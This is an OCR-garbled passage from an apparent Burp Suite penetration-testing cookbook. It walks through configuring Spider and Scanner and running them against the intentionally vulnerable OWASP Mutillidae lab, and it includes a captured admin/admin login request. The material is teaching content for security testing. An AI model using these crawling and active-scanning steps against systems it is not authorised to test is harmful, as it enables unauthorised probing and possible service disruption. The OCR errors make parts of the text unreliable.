5 These settings let you control how HTTP messages are displayed within the raw HTTP viewer/editor. 


Font: Courier New llpt Change font... 


(¥) Highlight request parameters 
Œ) Highlight response syntax 
(C Analyze and display AMF messages (use with caution) 


e Character Sets: It provides the ability to change the character sets 
determined by Burp to use a specific set or to display as raw bytes: 


(2) Character Sets 


These settings control how Burp handles different character sets when displaying raw HTTP messages. Note that some glyphs are not supported by all fonts. If you need to use 
G $ : 
an extended or unusual character set, you should first try a system font such as Courier New or Dialog. 


® Recognize automatically based on message headers 
O Use the platform default (windows-1252) 
© Display as raw bytes 


© Use a specific character set: | BigS bz) 


e HTML Rendering: It controls how HTML pages will display from the 
Render tab available on an HTTP response: 


@ HTML Rendering 
(e) These settings control how Burp handles in-tool rendering of HTML content. 


W) Allow renderer to make HTTP requests (for images, etc.) 


The Misc tab 


Under the Misc tab, a tester has the following options: 


e Hotkeys: It lets a user configure hotkeys for commonly-executed 
commands: 


(2) Hotkeys 
(3) These settings let you configure hotkeys for common actions. These include item-specific actions such as "Send to Repeater’, global actions such as "Switch to Proxy”, and 
in-editor actions such as “Cut” and “Undo”. 


Action | Hotkey | 
Send to Repeater Ctri+R ry 
Send to Intruder Ctr 

Forward intercepted Proxy message Ctri+F 

Toggle Proxy interception Ctris+T > 
Switch to Target Ctrl+Shift+T 

Switch to Proxy Ctril+Shift+P 

Switch to Scanner Ctri+Shift+S 
Switch tn Intruder Ctrl+ Shifts \y 


e Automatic Project Backup [disk projects only]: It provides the ability to 
determine how often backup copies of project files are made. By default, 
when using Burp Professional, backups are set to occur every 30 minutes: 


[2 Automatic Project Backup [disk projects only] 


ts Automatic project backup saves a copy of the Burp project file periodically in the background. 


Delete backup file on clean 


e Temporary Files Location: It provides the ability to change the location 
where temporary files are stored while running Burp: 


Q Temporary Files Location 


9 These settings let you configure where Burp stores ts temporary files. Changes wil take effect the next time Burp starts up. 


@ Use defaut system temp directory 


O Use custom location: Choose folder. 


e Proxy Interception: It provides the ability to always enable or always 
disable proxy intercept upon initially starting Burp: 


Proxy Interception 


2 
CG This setting controls the state of proxy interception at startup. 


Enable interception at startup: O) Always enable 
© Always disable 
O Restore setting from when Burp was last closed 


e Proxy History Logging: It provides the ability to customize prompting of 
out-of-scope items when the target scope changes: 


(2) Proxy History Logging 
(e) This setting controls whether adding items to Target scope will automatically set the Proxy option to stop sending out-of-scope items to the history or other Burp tools. 


When items are added to Target scope: ©) Stop sending out-of-scope items to Proxy history and other Burp tools 
® Prompt for action 
O Do nothing 


e Performance Feedback: It provides anonymous data to PortSwigger 
regarding Burp performance: 


&) &) 


Performance Feedback 
‘You can help improve Burp by submitting anonymous feedback about Burp's performance. 
O Submit anonymous feedback about Burp's performance 


Feedback only contains technical information about Burp's internal functioning, and does not identify you in any way. If you do report a bug via email, you can help us diagnose 
any problems that your instance of Burp has encountered by including your debug ID. 


Debug ID: | 64y9x04xrqm6dlaiSih: gh2j Copy 


_ Report bug_| 


Spidering with Spider 


Spidering is another term for mapping out or crawling a web application. This 
mapping exercise is necessary to uncover links, folders, and files present within 
the target application. 


In addition to crawling, Burp Spider can also submit forms in an automated 
fashion. Spidering should occur prior to scanning, since pentesters wish to 
identify all possible paths and functionality prior to looking for vulnerabilities. 


Burp provides an on-going spidering capability. This means that as a pentester 
discovers new content, Spider will automatically run in the background looking 
for forms, files, and folders to add to Target | Site map. 


There are two tabs available in the Spider module of Burp Suite. The tabs 
include control and options, which we will study in the Getting ready section of 
this recipe. 


Getting ready 


Using the OWASP Mutillidae II application found within the OWASP BWA VM, 
we will configure and use Burp Spider to crawl through the application. 


The Control tab 


Under the Control tab, a tester has the following options: 


e Spider Status: It provides the ability to turn the spidering functionality on 
or off (paused). It also allows us to monitor queued-up Spider requests 
along with bytes transferred, and so on. This section allows any forms 
queued to be cleared by clicking the Clear queues button: 


(2) Spider Status 


Use these settings to monitor and control Burp Spider. To begin spidering, browse to the target application, then right-click one or more nodes in the target site map, and choose 
"Spider this host / branch”. 


| Spideris paused | | Clear queues 


Requests made: 0 
Bytes transferred: 0 
Requests queued: 0 
Forms queued: 0 


e Spider Scope: It provides the ability to set the Spider Scope, either based 
on the Target | Site map tab or a customized scope: 
(P) Spider Scope 


| | © Use suite scope [defined in Target tab] 


() Use custom scope 


If the Use custom scope radio button is clicked, two tables appear, 
allowing the tester to define URLs to be included and excluded from 
scope: 


Spider Scope 
W 


O Use suite scope [defined in Target tab] 
@ Use custom scope 


(J Use advanced scope control 


Include in scope 


Wh 


Exclude from scope 


Prefix 


FEWER 


The Options tab 


Under the Options tab, a tester has the following options: 
e Crawler Settings: It provides the ability to regulate the number of links 


deep Spider will follow; also identifies basic web content to Spider for on a 
website such as the robots.txt file: 


[2] Crawler Settings 
(e) These settings control the way the Spider crawls for basic web content. 


W) Check robots.txt 

W) Detect custom "not found” responses 
W) Ignore links to non-text content 

W) Request the root of all directories 


W) Make a non-parameterized request to each dynamic page 
Maximum link depth: 5 


Maximum parameterized requests per URL: | 50 


e Passive Spidering: Spiders newly-discovered content in the background 
and is turned on by default: 


2) Passive Spidering 
o Passive spidering monitors traffic through Burp Proxy to update the site map without making any new reguests. 


W) Passively spider as you browse 


Link depth to associate with Proxy requests: |0 


e Form Submission: It provides the ability to determine how Spider interacts 
with forms. Several options are available including ignore, prompt for 
guidance, submit with default values found in the table provided, or use an 
arbitrary value (for example, 555-555-0199@example.com): 


Q Form Submission 


9 These settings control whether and how the Spider submits HTML forms, 


Individuate forms by: | Acton URL, method and fields 1 


© Don't submit forms 
C) Prompt for guidance 
@ Automatically submit using the following rules to assign text field values: 


559-333-0199 
123456789 
123 45 6789 


0123496788 


Ud) Set unmatched fields to: |555-555-0199@example.com 


p 


(4) terate all values of submit fields - max submissions per form: 10 


e Application Login: It provides the ability to determine how Spider 
interacts with login forms. Several options are available, including ignore, 
prompt for guidance, submit as standard form submission, or use 
credentials provided in text boxes: 


[2] Application Login 
[| These settings control how the Spider submits login forms. 


O Don't submit login forms 
© Prompt for guidance 
O Handle as ordinary forms 


O Automatically submit these credentials: 


e Spider Engine: It provides the ability to edit the number of threads used 
along with retry attempt settings due to network failures. Use the number of 
threads judiciously as too many thread requests could choke an application 
and affect its performance: 


Spider Engine 


These settings control the engine used for making HTTP requests when spidering. 


() fs) 


Number of threads: 10 
Number of retries on network failure: 3 
Pause before retry (milliseconds): 2000 


__) Throttle between requests (milliseconds): |0 
Add random variations to throttle 
e Request Headers: It provides the ability to modify the way the HTTP 


requests look originating from Burp Spider. For example, a tester can 
modify the user agent to have Spider look like a mobile phone: 


| Request Headers 


o These settings control the request headers used in HTTP requests made by the Spider. 


| Accent” 
-| Accept-Language: en 

User-Agent: hozila/5.0 (compatible; MSIE 9.0; Windows NT 6.1: Win64: x64: Trident/S.0) 
-| Connection: close 


How to do it... 


1. Ensure Burp and OWASP BWA VM are running, and Burp is configured in 
the Firefox browser used to view the OWASP BWA applications. 


2. From the OWASP BWA landing page, click the link to the OWASP 
Mutillidae II application: 


owaspbwa 


OWASP Broken Web Applications Project 


Version 1.2 


This is the VM for the Open Web Application Security Project (OWASP) Broken Web Applications project. It contains many, very vulnerable web 
applications, which are listed below. More information about this project can be found in the project User Guide and Home Page. 


For details about the known vulnerabilities in these applications, see https://sourceforge.net/p/owaspbwa/tickets/?limit=999&sort=_severity+asc. 


R !!! This VM has many serious security issues. We strongly recommend that you run it only 


on the "host only" or "NAT" network in the virtual machine settings !!! 


TRAINING APPLICATIONS 


O OWASP WebGoat É OWASP WebGoat. NET 
@owasp ESAPI Java SwingSet Interactive 
O OWASP RailsGoat O OWASP Bricks 
@owasp Security Shepherd Ô Ghost 

O Magical Code Injection Rainbow Ovwape 


@damn Vulnerable Web Application 


3. Go to the Burp Spider tab, then go to the Options sub-tab, scroll down to 
the Application Login section. Select the Automatically submit these 
credentials radio button. Type into the username textbox the word admin; 
type into the password textbox the word admin: 


Target | Proxy | Spider | Scanner | Intruder | Repeater | 
| Control | Options | 


@ Application Login 
(e) These settings control how the Spider submits login form 


© Don't submit login forms 

O Prompt for guidance 

© Handle as ordinary forms 

© Automatically submit these credentials: 


Username: admin 


Password: | ***** 


4. Return to Target | Site map and ensure the mutillidae folder is added to 
scope by right-clicking the mutillidae folder and selecting Add to scope: 


= =— 
| Site map [ scope | 


Fitter: Hiding out of Scope and not found items; hiding CSS, ima 


¥ | ò http192.168.56.101 
k mutillidae 
o TE matiidae 
- h) 
a = documentation 
4 framer.html 
> n includes 
a & index.php 
> in javascript 
O set-up-database.php 
> D webservices 


5. Optionally, you can clean up the Site map to only show in-scope items by 
clicking Filter: Hiding out of scope and not found items; hiding 
CSS, image and general binary content; hiding 4xx responses; 
hiding empty folders: 


Fiter: Hiding out of scope and not found items; hiding CSS, image and general binary content; hiding 4xx responses; hiding empty folders 


6. After clicking Filter: ..., You will see a drop-down menu appear. In this 
drop-down menu, check the Show only in-scope items box. Now, click 
anywhere in Burp outside of the drop-down menu to have the filter 
disappear again: 


Filter by search term Filter by fle extension 


O Show only: | asp,aspx,jsp,php 
Regex 


O Case sensitive ( Negative search D Hide: js,gif,ipg,png,css 


Show all Hide all Revert changes 


Filter: Hiding out of scope and not found items; hiding CSS, image and general binary content; hiding 4xx responses; hiding empty folders 


(2) Fiery request type _ Filter by MIME type _ Filter by status code Folders 
O W Show only in-scope items @ HTML Other text 2xx [Success] @) Hide empty folders 
O Show only requested items Script O images 3xx [redirection] 
O Show only parameterized requests XML @) Flash O 4xx [request error] 
Hide not-found items B css O Other binary Sxx [server error] 


Fiter by annotation 


O Show only commented items 


O Show only highlighted items 


7. You should now have a clean Site map. Right-click the mutillidae folder 


and select Spider this branch. 


If prompted to allow out-of-scope items, click Yes. 


Target | Proxy | spider | Scanner | intruder | Repeater | 


Fitter: Hiding out of scope and not found items; hiding CSS, image 


Y | ò http:/#192.168.56.101 
D mutillidae 


D5 http:/192.168.56.101/mutillidae 


Remove from scope 


Actively scan this branch 


> [i ja Passively scan this branch 
D se Engagement tools > 
. = i Compare site maps 


8. You should immediately see the Spider tab turn orange: 


9. Go to the Spider | Control tab to see the number of requests, bytes 
transferred, and forms in queue: 


| Target | Proxy | Spider | Scanner | Intruder | Repeater | 
[conta | optons | 


(?] Spider Status 


Use these settings to monitor and control Burp Spider. To 


| Spideris running | | Clear queues | 
Requests made: 31 


Bytes transferred: 1,798,761 
Requests queued: 0 


Forms queued: 0 


Let Spider finish running. 


10. Notice that Spider logged into the application using the credentials you 
provided in the Options tab. On Target | Site map, look for 
the /mutillidae/index.php/ folder structure: 


Fitter: Hiding not found items; hiding CSS, image and genera 


¥ og http/192.168.56.101 
Eb / 
O mutilidae 
v Me mutilidae 
> eT] 
> = documentation 
[O framer.html 
> [D includes 


11. Search for an envelope icon that contains password=admin&login-php- 
submit -button=Login&username=admin: 


IZ) page=robots-txt.pnp — 


[À page=secret-administrative-pages.php ( Request | Response | 


f page=set-background-color.php 


D page=show-log.php [ Raw | Params | Headers l Hex 


Fal page=show-log.php&deleteLogs=deleteLogs&popUpNotificationCode=LFD1 POST /mutillidae/index.php?page=login.php HTTP/1.1 


[AÀ page=site-footer-xss-discussion.php Host: 192.168.56.101 

Fa] Page=source-viewer.php -\) Accept-Encoding: gzip, deflate 

[A page=sqimap-targets.php Accept: */* 

[P page=ssl-misconfiguration.php Accept-Language: en 

Fal page=styling-frame.php&page-to-frame=styling.php%3F page-title% 3DStyling+with+Mut User-Agent: Mozilla/S.0 (compatible; MSIE 9.0; Windows NT 6.1; Winé4; x64; 
[A page=text-file-viewer.php Trident/5-0) 


Connection: close 
Referer: http: //192.168.56.101/mutillidae/index.php?page=login. php 
Content-Type: application/x-www-form-urlencoded 


[A page=upload-file.php 
[A page=usage-instructions.php 


f page=user-agent-impersonation.php Content-Length: 59 

fl page=user-info-xpath.php Cookie: showhints=l; acopendivids=swingset,jotto,phpbb2,redmine; 
f page=user-info.php acgroupswithpersist=nada; PHPSESSID=upg8 fmnlorrmvoh4nf4beSg312 

? =user-poll. phy 

D pied Tee password=adminélogin-php-submit-button=Loginéusername=admin 

f page=view-someones-biog. php 


Fal page=view-user-privilege-level php&iv=6bc24 fc ab650b25b41 14e93a98f1 eba 


This evidences the information Spider used the information you provided in the 
Spider | Options | Application Login section. 


Scanning with Scanner 


Scanner capabilities are only available in Burp Professional edition. 


Burp Scanner is a tool that automates the search for weaknesses within the 
runtime version of an application. Scanner attempts to find security 
vulnerabilities based on the behavior of the application. 


Scanner will identify indicators that may lead to the identification of a security 
vulnerability. Burp Scanner is extremely reliable, however, it is the responsibility 
of the pentester to validate any findings prior to reporting. 


There are two scanning modes available in Burp Scanner: 


e Passive scanner: Analyzes traffic passing through the proxy listener. This 
is why its so important to properly configure your target scope so that you 
aren't scanning more than is necessary. 

e Active scanner: Sends numerous requests that are tweaked from their 
original form. These request modifications are designed to trigger behavior 
that may indicate the presence of vulnerabilities 
(https://portswigger.net/kb/issues). Active scanner is focused on input-based 
bugs that may be present on the client and server side of the application. 


Scanning tasks should occur after spidering is complete. Previously, we learned 
how Spider continues to crawl as new content is discovered. Similarly, passive 
scanning continues to identify vulnerabilities as the application is crawled. 


Under the Options tab, a tester has the following options: Issue activity, Scan 
queue, Live scanning, Issue definitions, and Options: 


e Issue Activity: It displays all scanner findings in a tabular format; includes 
both passive and active scanner issues.: 


Target | Proxy | Spider Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 


[Scan queve | Live scanning | Issue definitions | Options 


| Action | Issue type | Host | Path Insertion point | Severity ‘ 
i a 
9 14:50:04 28 Aug 2018 Issue found ! Cookie without HttpOnly flag set http://192.168.56.101 /mutillidae/ Low 
10 14:50:04 28 Aug 2018 Issue found Path-relative style sheet import http:/192.168.56.101 /mutillidae/ information 
11 14:50:04 28 Aug 2018 issue found i HTML does not specify charset http://192.168.56.101 /mutillidae/ information 
12 15:17:37 28 Aug 2018 Issue found i Frameable response (potential Clickjacking) http://192.168.56.101 /mutillidae/index.php Information 
13 15:17:37 28 Aug 2018 Issue found @ Cleartext submission of password http://192.168.$6.101 /mutillidae/index.php High ( 
14 15:17:37 28 Aug 2018 Issue found ct) Password field with autocomplete enabled http://192.168.56.101 /mutillidae/index.php Low t 
15 15:17:37 28 Aug 2018 Issue found Path-relative style sheet import http//192.168.96.101 /mutillidaesindex.php Information 1 
16 15:17:37 28 Aug 2018 Issue found i Cross-domain Referer leakage http/192.168.56.101 /mutillidaesindex.php information 4 
= — = = — 


By selecting an issue in the table, the message details are displayed, 
including an advisory specific to the finding as well as message-editor 
details related to the request and response: 


(Target [Proxy Spider J Scanner | intruder Repeater Sequencer | Decoder Comparer [ Extender Project options “User options [Aerts 


1 Frameable response (potential Clickjacking) 


issue Frameable response (potential Clickjacking) 
Severty- Information 

Confidence: Firm 

Host https/192.168.56.101 

Path: Imutilii 

Issue description 


If a page fails to set an appropriate X-Frame-Options or Content-Security-Policy HTTP header, t might be possible for a page controlled by an attacker to load & within an iframe. This may enable a clickjacking attack, in which the attacker's page overlays 
the target application's interface with a different interface provided by the attacker. By inducing victim users to perform actions such as mouse clicks and keystrokes, the attacker can cause them to unwittingly carry out actions within the application 
that is being targeted This technique allows the attacker to circumvent defenses against cross-ste request forgery, and may result in unauthorized actions. 


Note that some applications attempt to prevent these attacks from within the HTML page self, using “framebusting” code. However, this type of defense is normally ineffective and can usually be circumvented by a skiled attacker. 


You should determine whether any functions accessible within frameable pages can be used by application users to perform any sensitive actions within the application, 


Issue remediation 


To effectively prevent framing attacks, the application should return a response header with the name X-Frame-Options and the value DENY to prevent framing altogether, or the value SAMEORIGIN to allow framing only by pages on the same origin 
as the response tself. Note that the SAMEORIGIN header can be partially bypassed if the application tself can be made to frame untrusted websites. 


e Scan queue: Displays the status of active scanner running; provides a 
percentage of completion per number of threads running as well as number 
of requests sent, insertion points tested, start time, end time, targeted host, 
and URL attacked. 


Scanner can be paused from the table by right-clicking and selecting 
Pause scanner; likewise, scanner can be resumed by right-clicking and 
selecting Resume Scanner. Items waiting in the scan queue can be 
cancelled as well: 


# à Host URL Status issues Requests: Errors insertion points Start time End time 


http//192.168.56.101 smutiidae/ 0% complete 15 03:43:57 29 Aug 2018 


J 
2 9 

3 http4/192. 168.586.101 Imutidae/ 0% complete 18 9 03:43:57 29 Aug 2018 
4 httpu/192.168.56.101 Jmutiindae/documentahon/mutdhsae-instalistion-on-xam 0% complete 13 8 03:43:57 29 Aug 2018 
S httpu/192.168.56.101 /mutiidae/tramer ntmi 11% complete 96 8 03:43:57 29 Aug 2018 
6 httpJ/192.168.56.101 smutilidae/includes/pop-up-help-context-generator. php 0% complete 1 22 9 03:43:57 29 Aug 2018 
7 http/192.168.56.101 smutilidae/includes/pop-up-help-context-generator php 0% complete 1 12 10 03:43:57 29 Aug 2018 
8 http.//192.168.56.101 /mutilidae/includes/pop-up-help-context-generator php 0% complete 2 13 10 03:43:57 29 Aug 2018 


e Live Active Scanning: It allows customization when active scanner will 
perform scanning activities: 


Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 


Issue activity | Scan queue | Live scanning | Issue definitions | Options 


(2) Live Active Scanning 
e) Automatically scan the following targets as you browse. Active scan checks send various malicious requests designed to identify common vulnerabilities. Use with caution. 


@ Dont scan 
© Use suite scope [defined in Target tab] 
© Use custom scope 


e Live Passive Scanning: It allows customization when passive scanner will 
perform scanning activities. By default, passive scanner is always on and 
scanning everything: 


9| 


Live Passive Scanning 


Automatically scan the following targets as you browse. Passive scan checks analyze your existing traffic for evidence of vulnerabilities, and do not send any new requests to the target. 


| 


© Don't scan 

@ Scan everything 

© Use suite scope [defined in Target tab] 
O Use custom scope 


e Issue definitions: It displays definitions for all vulnerabilities known to 
Burp scanners (active and passive). The list can be expanded through 
extenders but, using Burp core, this is the exhaustive listing, which includes 
title, description text, remediation verbiage, references, and severity level: 


Target | Proxy | spider J Scanner | intruder | Repeater | sequencer | Decoder | Comparer | Extender | Project options [User options | Alerts | 


Issue activity | Scan queue | Live scanning J issue definitions | Options | 


Issue Definitions 


This listing contains the definitions of all issues that can be detected by Burp Scanner. 


ASP.NET debugging enabled 

ASP.NET tracing enabled 

Ajax request header manipulation (DOM-based) 
Ajax request header manipulation (reflected DOM-based) 
Ajax request header manipulation (stored DOM-based) 
Base64-encoded data in parameter 

Browser cross-site scripting filter disabled 

CSS injection (reflected) 

CSS injection (stored) 

Cacheable HTTPS response 

Cleartext submission of password 

Client-side HTTP parameter pollution (reflected) 
Client-side HTTP parameter pollution (stored) 
Client-side JSON injection (DOM-based) 
Client-side JSON injection (reflected DOM-based) 
Client-side JSON injection (stored DOM-based) 
Client-side SQL injection (DOM-based) 
Client-side SQL injection (reflected DOM-based) 
Client-side SQL injection (stored DOM-based) 
Client-side XPath injection (DOM-based) 
Client-side XPath injection (reflected DOM-based) 
Client-side XPath injection (stored DOM-based) 
Client-side template injection 

Content type incorrectly stated 

Content type is not specified 

Cookie manipulation (DOM-based) 

Cookie manipulation (reflected DOM-based) 


Medium 
High 

Low 

Low 

Low 
Information 
Information 
Medium 
Medium 
Information 
High 

Low 

Low 

Low 

Low 

Low 

High 

High 

High 

Low 

Low 

Low 

High 

Low 
Information 
Low 

Low 


0x00100800 
0x00100280 
0x00500c00 
0x00500c01 
0x00500c02 
0x00700200 
0x005009b0 
0x00501300 
0x00501301 
0x00700100 
0x00300100 
0x00501400 
0x00501401 
0x00200370 
0x00200371 
0x00200372 
0x00200330 
0x00200331 
0x00200332 
0x00200360 
0x00200361 
0x00200362 
0x00200308 
0x00800400 
0x00800500 
0x00500b00 
0x00500b01 


ASP.NET ViewState without MAC enabled 


Description 


The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across 
successive requests. The data to be persisted is serialized by the server and transmitted via a hidden form field. When it is posted 
back to the server, the ViewState parameter is deserialized and the data is retrieved. 


By default, the serialized value is signed by the server to prevent tampering by the user; however, this behavior can be disabled 
by setting the Page. EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the | 
View State and cause arbitrary data to be deserialized and processed by the server. If the ViewState contains any items that are 
critical to the server's processing of the request, then this may result in a security exposure. 


The contents of the deserialized View State should be reviewed to determine whether it contains any critical items that can be 
manipulated to attack the application 


Remediation 
There is no good reason to disable the default ASP.NET behavior in which the ViewState is signed to prevent tampering. To 


ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not 
currently signed, | 


Vulnerability classifications 


@ CWE-642: External Control of Critical State Data 


Typical severity 


Low 


e Options: Several sections are available, including Attack Insertion Points, 
Active Scanning Engine, Attack Scanning Optimization, and Static code 


analysis. 


o Attack Insertion Points: It allows customization for Burp insertion 
points; an insertion point is a placeholder for payloads within different 
locations of a request. This is similar to the Intruder payload marker 
concept discussed in Chapter 2, Getting to Know the Burp Suite of 


Tools: 


Attack Insertion Points 


(o) Place attacks into the following locations within requests: 


@ URL parameter values 

E) Body parameter values 

Œ) Cookie parameter values 

@ Parameter name 

Œ) HTTP headers 

@ Entire body (for relevant content types) 
(C AMF string parameters (use with caution) 
@ URL path filename 

C URL path folders 


Change parameter locations (causes many more scan requests): 


© URL to body () URL to cookie 
O Body to URL () Body to cookie 
O Cookie to URL C Cookie to body 


Nested insertion points are used when an insertion points base value contains data in a recognized format (for example, XML data within a URL parameter): 


@ Use nested insertion points 


Maximum insertion points per base request: 30 


Skip server-side injection tests for these parameters: 


Body parameter 


HE 


Body parameter 
Body parameter 
Body parameter 
Any parameter 


Skip all tests for these parameters: 
7 
ES 
[_Renove | 


hd 


Recommendations here include adding the URL-to-body, Body- 
to-URL, cookie-to-URL, URL-to-cookie, body-to-cookie, and 
cookie-to-body insertion points when performing an assessment. 
This allows Burp to fuzz almost, if not all, available parameters in 
any given request. 


o Active Scanning Engine: It provides the ability to configure the 
number of threads (for example, Concurrent request limit) scanner will 
run against the target application. This thread count, compounded with 
the permutations of insertion points, can create noise on the network 
and a possible DOS attack, depending upon the stability of the target 
application. Use caution and consider lowering the Concurrent request 
limit. The throttling of threads is available at this configuration section 
as well: 


(2) Active Scanning Engine 


(o) These settings control the engine used for making HTTP requests when doing active scanning. 


Concurrent request limit: 10 


Number of retries on network failure: 3 
Pause before retry (milliseconds): 2000 


_J Throttle between requests (milliseconds): 


Œ) Follow redirections where necessary 


o Attack Scanning Optimization: It provides three settings for scan 
speed and scan accuracy. 
= Available Scan speed settings include Normal, Fast, and 
Thorough. Fast makes fewer requests and checks derivations of 
issues. Thorough makes more requests and checks for derivations 


of issues. Normal is the medium setting between the other two 
choices. The recommendation for Scan speed is Thorough. 

= Available Scan accuracy settings include Normal, Minimize false 
negatives, and Minimize false positives. Scan accuracy relates to 
the amount of evidence scanner requires before reporting an 
issue. The recommendation for Scan accuracy is Normal: 


|2| Active Scanning Optimization 


D These settings let you control the behavior of the active scanning logic to reflect the objectives of the scan and the nature of the target application. See the 


Scan speed: | Norma |7 
Scan accuracy: | Norma ad 


(E) Use inteligent attack selection 


o Static Code Analysis: It provides the ability to perform static analysis 
of binary code. By default, this check is performed in active scanner: 


?) Static Code Analysis 


©) These settings control the types of scanning that will include static analysis of executable code. Note that static analysis can consume large amounts of memory and processing, and so it may be desirable to restrict static analysis to key targets 
of interest. 


®© Active scanning only 
O Active and passive scanning 


© Dont perform static code analysis 


Maximum analysis time per item (seconds): 120 


e Scan Issues: It provides the ability to set which vulnerabilities are tested 
and for which scanner (that is, passive or active). By default, all 
vulnerability checks are enabled: 


Scan Issues 


© These settings control which issues Burp will check for. You can select issues by scan type or individually. If you select individual issues, you can also select the detection methods that are used for some types of issues. 


@ Select by scan type: 
@ Passive 
@ Light active 
@ Medium active 
@ intrusive active 
@ Static code analysis 


O Select individual issues: 


SY Fiter Passive Light + Medium intrusive | Static P |Search... 
(© Unidentified code injection e High 0x00101000 E] 
(© Server-side template injection e High 0x00101080 
© $Slinjection e High 0x00101100 All methods enabled 
A Cross-site scripting (stored) e High 0x00200100 All methods enabled 
O HTTP response header injection e High 0x00200200 
4 Cross-site scripting (reflected) t High 0x00200300 All methods enabled 
© Client-side template injection . High 0x00200308 > 
4 Cross-site scripting (DOM-based) e e High 0x00200310 
E Cross-site scripting (reflected DOM... e © High 0x00200311 
Œ Cross-site scripting (stored DOM-b... e © High 0x00200312 
© JavaScript injection (DOM-based) e © High 0x00200320 
© JavaScript injection (reflected DOM-... G © High 0x00200321 
w JavaScript injection (stored DOM-ba... e e High 0x00200322 
E Path-relative style sheet import o information  0x00200328 
© Client-side SQL injection (DOM-bas.... e © High 0x00200330 
© Client-side SQL injection (reflected ... e © High 0x00200331 
| Æ  Cient-side SQL iniection (stored DO... . © Hih 0x00200332 M 


Getting ready 


Using the OWASP Mutillidae II application found within the OWASP BWA VM, 
we will begin our scanning process and monitor our progress using the Scan 


queue tab. 


How to do it... 


Ensure Burp and OWASP BWA VM is running while Burp is configured in the 
Firefox browser used to view the OWASP BWA applications. 


From the OWASP BWA landing page, click the link to the OWASP Mutillidae II 
application: 


1. From the Target | Site map tab, right-click the mutillidae folder and select 
Passively scan this branch. The passive scanner will hunt for vulnerabilities, 
which will appear in the Issues window: 


Filter: Hiding out of scope and not found items; hiding CSS, image and 


Y | @ http//192.168.55.101 
[À mutilidae 


¥ 
> ip! [ie http://192.168.56.101/mutillidae 
> coco 


L 4 n Spider this branch 
> D includes 
> iG index.ph Actively scan this branch 


> D5 javascri Passively scan this branch 


> É level-t-h Engagement tools > 


Compare site maps 
Expand branch 


2. From the Target | Site map tab, right-click the mutillidae folder and select 
Actively scan this branch: 


Filter: Hiding out of Scope and not found items; hiding CSS, image and- 


Y | @ http./192.168.56.101 
[Ì mutillidae 


Dè http://192.168.56.104/mutillidae 


M Remeron 


Spider this branch 


Actively scan this branch 


Passively scan this branch 
Engagement tools je 


Compare site maps 


3. Upon initiating the active scanner, a pop-up dialog box appears prompting 
for removal of duplicate items, items without parameters, items with media 
response, or items of certain file types. This pop-up is the Active scanning 
wizard. For this recipe, use the default settings and click Next: 


Bi Active scanning wizard 


(2) You have selected 104 items for active scanning. Before continuing, you can use the filters below to remove certain categories of 


items, to make your scanning more targeted and efficient. 


I) Remove duplicate items (same URL and parameters) (62 items] 
Remove items already scanned (same URL and parameters) [all 104 items] 
Remove out-of-scope items [0 items) 

|) Remove items with no parameters [17 items] 

Œ) Remove items with media responses [0+ items] 

(J Remove items with the following extensions (6 items] 


i8,if,jpg,png,css 


Note: Some of the selected items do not yet have responses. If you choose to remove items with media responses, some of these 
items may be removed from the scan when their responses have been analyzed. 


(cn) (re) 


Verify all paths shown are desired for scanning. Any undesired file types or 
paths can be removed with the Remove button. Once complete, click OK: 


BB) Active scanning wizard = 0D X 


Q Review the items you have selected for scanning. Double-click items to view full details. You can remove individual items which you 
= do not wish to scan, or go back to modify your general fiters. 


Host A Method | URL | Params | Co 
http://192.168.56.101 GET {mutillidae/ 0 0 
http://192.168.56.101 GET {mutilidae!?page=add-to-your-blog. php 1 0 
http://192.168.56.101 GET imutilidae/documentation/mutilidae-installation-on-xam... 0 0 
http://192.168.56.101 GET {mutilidae/framer.html 0 0 
http://192.168.56.101 GET imutilidae/ncludes/pop-up-help-context-generator.php 0 0 
http://192.168.56.101 GET {mutilidae/includes/pop-up-help-context-generator.ph... 1 0 
http://192.168.56.101 GET Imutilidae/index.php 0 0 
http://192.168.56.101 GET imutilidae/index.php?do=logout 1 0 
http://192.168.56.101 GET imutilidae/ndex.php?do=toggle-bubble-hints&page=/0... 2 0 
P| 


32 items Remove Revert 
Note: You have selected to remove items with media responses. Some of the above items do not yet have responses and 30 may 
be removed from the scan when their responses have been analyzed. 


You may be prompted regarding the out-of-scope items. If so, click Yes 
to include those items. Scanner will begin. 


5. Check the status of scanner by looking at the Scanner queue tab: 


Target | Proxy | Spider | Scanner | intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 
Issue activity | Scan queue Live scanning | Issue definitions | Options 


# | Host | URL | Status | Issues | Requests | Errors | Insertion points | 
54 http://192.168.56.101 /mutilidae/webservices/soap/ws-hello-world.php finished 567 9 

56  http:4192.168.56.101 Imutilidae/ 0% complete 38 9 

57 http://192.168.56.101 /mutillidae/ 0% complete 38 9 

58 http://192.168.56.101 /mutiliidae/documentation/mutillidae-installation-on-xam... 0% complete 21 8 

59 http://192.168.56.101 /mutillidae/framer.html finished 3 487 8 

60 http://192.168.56.101 /mutillidae/includes/pop-up-help-context-generator.php 10% complete 1 77 9 

61 http://192.168.56.101 /mutillidae/includes/pop-up-help-context-generator.php 0% complete 1 45 10 

62 http//192.168.56.101 /mutilidae/includes/pop-up-help-context-generator.php 0% complete 1 16 10 

63 http://192.168.56.101 /mutillidae/index.php waiting 


6. As scanner finds issues, they are displayed on the Target tab, in the Issues 
panel. This panel is only available in the Professional edition since it 


complements the scanner's functionality: 


Y a https/192.168.56.101 
C) mutilidae 

| Tomie 

>@/ 

> E documentation 
[by framer htm! 

> [lip includes 

> @ index php 

> DB javascript 

> GÈ level-1-hints-page-wrapper.php 
[b set-up-database php 

> [lip webservices 


Logging of out-of-scope Proxy traffic is disabled 


Fiter: Hiding out of scope and not found items; hiding CSS, image and general binary content; hiding 4x responses; hiding empty folders 


Contents 


http:1/192.168.56.101 GET 7 
http:1192.168.56.101 GET /mutiidae/documentation 
http:11192.168.56.101 GET mutilidae/framer htm 
http:11192.168.58.101 GET /mutiidae/ncludesipop-u... 
http 192.168.586.101 GET /mutiidaeñncludesipop-u.. V 
http:1192,168.56.101 GET /mutiidaeñncludesipop-u.. V 
http:1192.168.56.101 GET /mutiidaeñnciudesipop-u.. V 
http:11192.168.56.101 GET mutilidae/index php?pag,. V 
http192.168.56.101 GET i 


Issues 


KET 
